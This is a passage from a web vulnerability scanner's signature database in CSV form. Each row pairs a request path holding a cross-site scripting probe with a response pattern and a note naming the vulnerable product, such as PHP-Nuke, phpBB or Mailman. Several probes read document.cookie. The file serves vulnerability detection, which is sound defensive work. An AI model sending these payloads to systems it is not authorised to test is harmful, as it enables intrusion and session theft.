(XSS).\",\"\",\"\"\n\"000812\",\"\",\"4\",\"/phpwebsite/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+%00\\\"><script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000813\",\"\",\"4\",\"/phpwebchat/register.php?register=yes&username=OverG&email=<script>alert%20(\\\"Vulnerable\\\")</script>&email1=<script>alert%20(\\\"Vulnerable\\\")</script>\",\"GET\",\"BODY:alert\\(\\\"Vulnerable\\\"\\)<\\/script>\",\"PHP Web Chat 2.0 is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000814\",\"CVE-2002-1995\",\"4\",\"/phptonuke.php?filnavn=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"PHP-Nuke add-on PHPToNuke is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000815\",\"CVE-2002-1799\",\"4\",\"/phprank/add.php?page=add&spass=1&name=2&siteurl=3&email=%3Cscript%3Ealert(Vulnerable)%3C/script%3E\",\"GET\",\"BODY:<script>alert\\(Vulnerable\\)<\\/script>\",\"phpRank is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000816\",\"CVE-2007-1287\",\"4\",\"/phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Contains PHP configuration information and is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000817\",\"CVE-2007-1287\",\"4\",\"/phpinfo.php3?VARIABLE=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Contains PHP configuration information and is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000818\",\"CVE-2002-1724\",\"4\",\"/phpimageview.php?pic=javascript:alert(8754)\",\"GET\",\"CODE:200&&BODY:alert\\(8754\\)&&!BODY:The\\sdocument\\shas\\smoved\",\"PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000819\",\"CVE-2002-1702,http://www.deltascripts.com/\",\"4\",\"/phpclassifieds/latestwap.php?url=<script>alert('Vulnerable');</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"PHP Classifieds 6.05 is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000820\",\"CVE-2003-0484\",\"4\",\"/phpBB/viewtopic.php?topic_id=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"phpBB is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.\",\"\",\"\"\n\"000821\",\"CVE-2003-0484\",\"4\",\"/phpBB/viewtopic.php?t=17071&highlight=\\\">\\\"<script>javascript:alert(document.cookie)</script>\",\"GET\",\"BODY:<script>javascript:alert\\(document\\.cookie\\)<\\/script>\",\"phpBB is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000822\",\"CVE-2011-3392\",\"4\",\"/phorum/admin/header.php?GLOBALS[message]=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000823\",\"OSVCVE-2011-339244\",\"4\",\"/phorum/admin/footer.php?GLOBALS[message]=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000824\",\"\",\"4\",\"/pforum/edituser.php?boardid=&agree=1&username=%3Cscript%3Ealert('Vulnerable')%3C/script%3E&nickname=test&email=test@example.com&pwd=test&pwd2=test&filled=1\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Pforum 1.14 is vulnerable to Cross Site Scripting (XSS). CA-2000-02\",\"\",\"\"\n\"000825\",\"\",\"4\",\"/pages/htmlos/%3Cscript%3Ealert('Vulnerable');%3C/script%3E\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Aestiva HTML/OS is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000826\",\"\",\"4\",\"/Page/1,10966,,00.html?var=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Vignette server is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.\",\"\",\"\"\n\"000827\",\"CVE-2003-1145\",\"4\",\"/openautoclassifieds/friendmail.php?listing=<script>alert\\(document.domain\\);<\\/script>\",\"GET\",\"BODY:<script>alert\\(document\\.domain\\);<\\/script>\",\"OpenAutoClassifieds 1.0 is vulnerable to a XSS attack\",\"\",\"\"\n\"000828\",\"CVE-2003-1145\",\"4\",\"/openautoclassifieds/friendmail.php?listing=&lt;script&gt;alert(document.domain);&lt;/script&gt;\",\"GET\",\"BODY:<script>alert\\(document\\.domain\\)<\\/script>\",\"OpenAutoClassifieds 1.x is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000829\",\"\",\"4\",\"/node/view/666\\\"><script>alert(document.domain)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.domain\\)<\\/script>\",\"Drupal 4.2.0 RC is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000830\",\"CVE-2003-1285\",\"4\",\"/netutils/whodata.stm?sitename=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Sambar Server before 6.0 beta 6 default script is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000831\",\"\",\"4\",\"/nav/cList.php?root=</script><script>alert('Vulnerable')/<script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)\\/<script>\",\"RaQ3 server script is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000832\",\"CVE-2003-1372\",\"4\",\"/myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query=\",\"GET\",\"CODE:200&&BODY:\\[script\\]alert\\('Vulnerable\\)\",\"myphpnuke is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000833\",\"CVE-2003-1372\",\"4\",\"/myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query=\",\"GET\",\"CODE:200&&BODY:<script>alert\\('Vulnerable\\)\",\"myphpnuke is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000834\",\"CVE-2003-1372\",\"4\",\"/myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent\",\"GET\",\"CODE:200&&BODY:\\[script\\]alert\\(document\\.cookie\\)\",\"myphpnuke is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000835\",\"CVE-2003-1372\",\"4\",\"/myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)\",\"myphpnuke is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000836\",\"\",\"4\",\"/myhome.php?action=messages&box=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"OpenBB 1.0.0 RC3 is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000837\",\"\",\"4\",\"/msadm/user/login.php3?account_name=\\\"><script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"The Sendmail Server Site User login is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000838\",\"\",\"4\",\"/msadm/site/index.php3?authid=\\\"><script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"The Sendmail Server Site Administrator Login is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000839\",\"\",\"4\",\"/msadm/domain/index.php3?account_name=\\\"><script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"The Sendmail Server Site Domain Administrator login is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000840\",\"https://www.exploit-db.com/exploits/22383\",\"4\",\"/modules/Submit/index.php?op=pre&title=<script>alert(document.cookie);</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)\",\"Basit CMS 1.0 is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000841\",\"\",\"4\",\"/modules/Forums/bb_smilies.php?site_font=}--></style><script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000842\",\"\",\"4\",\"/modules/Forums/bb_smilies.php?name=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000843\",\"\",\"4\",\"/modules/Forums/bb_smilies.php?Default_Theme=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000844\",\"\",\"4\",\"/modules/Forums/bb_smilies.php?bgcolor1=\\\"><script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000845\",\"\",\"4\",\"/modules.php?op=modload&name=Xforum&file=member&action=viewpro&member=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"The XForum (PHP-Nuke Add-on module) is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000846\",\"\",\"4\",\"/modules.php?op=modload&name=Xforum&file=<script>alert('Vulnerable')</script>&fid=2\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"The XForum (PHP-Nuke Add-on module) is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000847\",\"CVE-2002-1070\",\"4\",\"/modules.php?op=modload&name=Wiki&file=index&pagename=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Wiki PostNuke Module is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000848\",\"\",\"4\",\"/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000849\",\"\",\"4\",\"/modules.php?op=modload&name=WebChat&file=index&roomid=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000850\",\"\",\"4\",\"/modules.php?op=modload&name=Members_List&file=index&letter=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"This install of PHP-Nuke's modules.php is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000851\",\"\",\"4\",\"/modules.php?op=modload&name=Guestbook&file=index&entry=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000852\",\"\",\"4\",\"/modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(9456);%3E&parent_id=0\",\"GET\",\"CODE:200&&BODY:javascript:alert\\(9456\\)&&!BODY:The\\sdocument\\shas\\smoved\",\"Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000853\",\"CVE-2001-1523\",\"4\",\"/modules.php?op=modload&name=DMOZGateway&file=index&topic=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"The DMOZGateway (PHP-Nuke Add-on module) is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000854\",\"https://www.exploit-db.com/exploits/22761\",\"4\",\"/modules.php?op=modload&name=books&file=index&req=search&query=|script|alert(document.cookie)|/script|\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)\",\"PostNuke CMS is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000855\",\"\",\"4\",\"/modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Francisco Burzi PHP-Nuke 5.6, 6.0, 6.5 RC1/RC2/RC3, 6.5 is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000856\",\"\",\"4\",\"/modules.php?name=Your_Account&op=userinfo&uname=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000857\",\"\",\"4\",\"/modules.php?name=Surveys&pollID=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000858\",\"CVE-2004-2020\",\"4\",\"/modules.php?name=Stories_Archive&sa=show_month&year=<script>alert('Vulnerable')</script>&month=3&month_l=test\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000859\",\"CVE-2004-2020\",\"4\",\"/modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000860\",\"CVE-2001-1524\",\"4\",\"/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=02&ttitle=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"This install of PHP-Nuke is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000861\",\"\",\"4\",\"/modules.php?name=Classifieds&op=ViewAds&id_subcatg=75&id_catg=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000862\",\"\",\"4\",\"/modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index\",\"GET\",\"CODE:200&&BODY:javascript:alert\\(document\\.cookie\\);\",\"Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000863\",\"https://www.exploit-db.com/exploits/28589\",\"4\",\"/members.asp?SF=%22;}alert(223344);function%20x()\\{v%20=%22\",\"GET\",\"CODE:200&&BODY:alert\\(223344\\)&&!BODY:The\\sdocument\\shas\\smoved\",\"Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000864\",\"https://seclists.org/fulldisclosure/2003/Jun/886\",\"4\",\"/megabook/admin.cgi?login=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Megabook guestbook is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000865\",\"\",\"4\",\"/mailman/options/yourlist?language=en&email=&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt;\",\"GET\",\"BODY:<SCRIPT>alert\\('Vulnerable'\\)<\\/SCRIPT>\",\"Mailman 2.1 is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000866\",\"\",\"4\",\"/mailman/listinfo/<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Mailman is vulnerable to Cross Site Scripting (XSS). Upgrade to version 2.0.8 to fix.\",\"\",\"\"\n\"000867\",\"https://www.exploit-db.com/exploits/23410\",\"4\",\"/ldap/cgi-bin/ldacgi.exe?Action=<script>alert(\\\"Vulnerable\\\")</script>\",\"GET\",\"BODY:<script>alert\\(\\\"Vulnerable\\\"\\)<\\/script>\",\"IBM Directory Server 4.1 Web Admin, ldacgi.exe is vulnerable to XSS attack.\",\"\",\"\"\n\"000868\",\"CVE-2002-0504\",\"4\",\"/launch.jsp?NFuse_Application=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"NFuse is vulnerable to cross site scripting (XSS) in the GetLastError function. Upgrade to the latest version.\",\"\",\"\"\n\"000869\",\"CVE-2002-0504\",\"4\",\"/launch.asp?NFuse_Application=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"NFuse is vulnerable to cross site scripting (XSS) in the GetLastError function. Upgrade to the latest version.\",\"\",\"\"\n\"000870\",\"CVE-2002-1053\",\"4\",\"/jigsaw/\",\"GET\",\"CODE:200\",\"Jigsaw server may be installed. Versions lower than 2.2.1 are vulnerable to Cross Site Scripting (XSS) in the error page.\",\"\",\"\"\n\"000872\",\"CVE-2003-1285\",\"4\",\"/isapi/testisa.dll?check1=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Sambar Server 6.0 beta 6 default script is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000873\",\"\",\"4\",\"/index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt;\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Led-Forums allows any user to change the welcome message, and it is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000874\",\"\",\"4\",\"/index.php?file=Liens&op=\\\"><script>alert('Vulnerable');</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\);<\\/script>\",\"Nuked-klan 1.3b is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000875\",\"\",\"4\",\"/index.php?catid=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"PostNuke is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000876\",\"\",\"4\",\"/index.php?action=storenew&username=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page.\",\"\",\"\"\n\"000877\",\"http://www.minibb.net\",\"4\",\"/index.php?action=search&searchFor=\\\"><script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"MiniBB is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000878\",\"\",\"4\",\"/index.php/\\\"><script><script>alert(document.cookie)</script><\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"eZ publish v3 and prior allow Cross Site Scripting (XSS).\",\"\",\"\"\n\"000879\",\"\",\"4\",\"/index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"eZ publish v3 and prior allow Cross Site Scripting (XSS).\",\"\",\"\"\n\"000880\",\"\",\"4\",\"/index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"eZ publish v3 and prior allow Cross Site Scripting (XSS).\",\"\",\"\"\n\"000881\",\"CVE-2003-1187\",\"4\",\"/include.php?path=contact.php&contact_email=\\\">&lt;script&gt;alert(document.cookie);&lt;/script&gt;\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"PHPKIT is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000882\",\"\",\"4\",\"/html/partner.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\);<\\/script>\",\"myphpnuke version 1.8.8_final_7 is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000883\",\"\",\"4\",\"/html/chatheader.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\);<\\/script>\",\"myphpnuke version 1.8.8_final_7 is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000884\",\"\",\"4\",\"/html/cgi-bin/cgicso?query=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"This CGI is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000885\",\"CVE‑2003‑1182\",\"4\",\"/guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E\",\"GET\",\"CODE:200\",\"MPM Guestbook 1.2 and previous are vulnreable to XSS attacks.\",\"\",\"\"\n\"000886\",\"CVE-2003-0614\",\"4\",\"/gallery/search.php?searchstring=<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.\",\"\",\"\"\n\"000887\",\"CVE-2001-1524\",\"4\",\"/friend.php?op=SiteSent&fname=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"This version of PHP-Nuke's friend.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.\",\"\",\"\"\n\"000888\",\"https://www.exploit-db.com/exploits/28589\",\"4\",\"/forum_members.asp?find=%22;}alert(9823);function%20x()\\{v%20=%22\",\"GET\",\"CODE:200&&BODY:alert\\(9823\\)&&!BODY:The\\sdocument\\shas\\smoved\",\"Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000889\",\"CVE‑2003‑1197\",\"4\",\"/forums/index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt;\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<script>\",\"LedForums allows any user to change the welcome message, and it is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000890\",\"CVE-2006-6133,CVE-2002-1845\",\"4\",\"/forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"YaBB is vulnerable to Cross Site Scripting (XSS) in the password field of the login page.\",\"\",\"\"\n\"000891\",\"CVE-2002-0958\",\"4\",\"/forums/browse.php?fid=3&tid=46&go=<script>JavaScript:alert('Vulnerable');</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"php(Reactor) is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000892\",\"CVE-2003-0763\",\"4\",\"/esp?PAGE=&lt;script&gt;alert(document.cookie)&lt;/script&gt;\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Escapade Scripting Engine is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000893\",\"CVE-2002-1027\",\"4\",\"/error/500error.jsp?et=1<script>alert('Vulnerable')</script>;\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Macromedia Sitespring 1.2.0(277.1) on Windows 2000 is vulnerable to Cross Site Scripting (XSS) in the error pages.\",\"\",\"\"\n\"000894\",\"CVE‑2002‑1929\",\"4\",\"/downloads/pafiledb.php?action=rate&id=4?\\\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\\\"\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Pafiledb by PHP Arena is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000895\",\"CVE‑2002‑1929\",\"4\",\"/downloads/pafiledb.php?action=email&id=4?\\\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\\\"\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Pafiledb by PHP Arena is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000896\",\"CVE‑2002‑1929\",\"4\",\"/downloads/pafiledb.php?action=download&id=4?\\\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\\\"\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Pafiledb by PHP Arena is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000897\",\"\",\"4\",\"/download.php?sortby=&dcategory=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"This version of PHP-Nuke's download.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.\",\"\",\"\"\n\"000898\",\"\",\"4\",\"/default.php?info_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E\",\"GET\",\"BODY:<script language=javascript>window\\.alert\\(document\\.cookie\\);<\\/script>\",\"osCommerce is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000899\",\"\",\"4\",\"/default.php?error_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E\",\"GET\",\"BODY:<script language=javascript>window\\.alert\\(document\\.cookie\\);<\\/script>\",\"osCommerce is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000900\",\"CVE-2002-0958\",\"4\",\"/comments/browse.php?fid=2&tid=4&go=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"php(Reactor) v1.2.7 and older are vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000901\",\"\",\"4\",\"/comments.php?subject=<script>alert('Vulnerable')</script>&comment=<script>alert('Vulnerable')</script>&pid=0&sid=0&mode=&order=&thold=op=Preview\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"This version of PHP-Nuke's comments.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.\",\"\",\"\"\n\"000902\",\"https://www.exploit-db.com/exploits/22357\",\"4\",\"/cleartrust/ct_logon.asp?CTLoginErrorMsg=<script>alert(1)</script>\",\"GET\",\"BODY:<script>alert\\(1\\)<\\/script>\",\"RSA ClearTrust allows Cross Site Scripting (XSS).\",\"\",\"\"\n\"000903\",\"https://www.exploit-db.com/exploits/22357\",\"4\",\"/cleartrust/ct_logon.asp?CTAuthMode=BASIC&CTLoginErrorMsg=xx&ct_orig_uri=\\\"><script>alert(1)/script><\\\"\",\"GET\",\"BODY:<script>alert\\(1\\)<\\/script>\",\"RSA ClearTrust allows Cross Site Scripting (XSS).\",\"\",\"\"\n\"000904\",\"\",\"4\",\"/chat/register.php?register=yes&username=OverG&email=<script>alert%20(\\\"Vulnerable\\\")</script>&email1=<script>alert%20(\\\"Vulnerable\\\")</script>\",\"GET\",\"BODY:alert\\(\\\"Vulnerable\\\"\\)<\\/script>\",\"PHP Web Chat 2.0 is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000905\",\"https://vulners.com/osvdb/OSVDB:651\",\"4\",\"/cgi-local/cgiemail-1.6/cgicso?query=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"This CGI is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000906\",\"https://vulners.com/osvdb/OSVDB:651\",\"4\",\"/cgi-local/cgiemail-1.4/cgicso?query=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"This CGI is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000907\",\"\",\"4\",\"@CGIDIRStest2.pl?&lt;script&gt;alert('Vulnerable');&lt;/script&gt;\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Default Monkey server script is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000908\",\"https://seclists.org/bugtraq/2003/Oct/63\",\"4\",\"/cgi-bin/.cobalt/message/message.cgi?info=%3Cscript%3Ealert%28%27alert%27%29%3B%3C/script%3E\",\"GET\",\"BODY:alert\\(\\\"alert\\\"\\)\",\"Cobalt RaQ Web Control Panel is vulnerable to Cross Site Scripting 